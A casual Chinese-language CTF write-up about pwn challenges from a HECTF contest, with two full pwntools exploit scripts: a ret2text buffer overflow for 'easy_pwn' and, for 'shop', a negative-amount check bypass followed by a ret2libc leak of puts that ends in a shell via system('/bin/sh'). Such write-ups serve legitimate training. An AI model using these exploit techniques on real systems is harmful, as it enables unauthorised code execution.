由于期末的原因就吃饭的时候看了两眼(?)
做的三道都签到级()
nc姑且就不说了,连上,好像就没什么难点了
easy_pwn
没啥好说的,混淆了一次HECTF,打ret2text
from pwn import *
io = remote("8.153.93.57",30214)
#io = process("./pwn")
#gdb.attach(io)
io.sendline(b'GDBSE')
sh = 0x0000000004011D6
ret = 0x000000000040101a
pd = b'a'* (0x30+8) + p64(ret) +p64(sh)
io.sendline(pd)
io.interactive()shop
仍然简单,-1绕过检查,然后打ret2libc,很常规
from pwn import *
context.log_level = 'debug'
io = process("./pwn")
elf = ELF("./pwn")
libc = ELF("./libc.so.6")
record = 0x000000000401266
ret = 0x000000000040101a
#admin pannel
io.sendlineafter(b'choice:',b'2')
io.sendlineafter(b'password:',b'shopadmin123')
io.sendlineafter(b'amount:',b'-1')
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
pop_rdi = 0x0000000000401240
io.sendline(b'okabe')
io.sendline(b'123')
leak = b'a'*(0x50+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(record)
#gdb.attach(io)
io.sendline(leak)
io.recvuntil(b'description:\n')
leak_puts = io.recv(6)
puts = u64(leak_puts.ljust(8,b'\x00'))
h_puts = hex(puts)
log.success(h_puts)
#calulate padding of libc
libc_base = puts - libc.symbols['puts']
h_libc_base = hex(libc_base)
log.success(h_libc_base)
io.sendline(b'okabe')
io.sendline(b'123')
system = libc.symbols['system'] + libc_base
sh = libc_base + next(libc.search(b'/bin/sh'))
pd = b'a' * (0x50+8) + p64(ret) + p64(pop_rdi) + p64(sh) + p64(system)
gdb.attach(io)
io.sendline(pd)
io.interactive()依稀记得吃完的时候还要零解题,如果有打的师傅看到这篇文章,能不能发发剩下的pwn题,忘下载了()
不过忙期末周估计也没啥时间打就是了()
原本想着去年打HE的时候好像没做出什么题今年好好来复仇(bushi),但今年碰上期末周拼尽全力无法战胜了,就这样吧()
这么强?!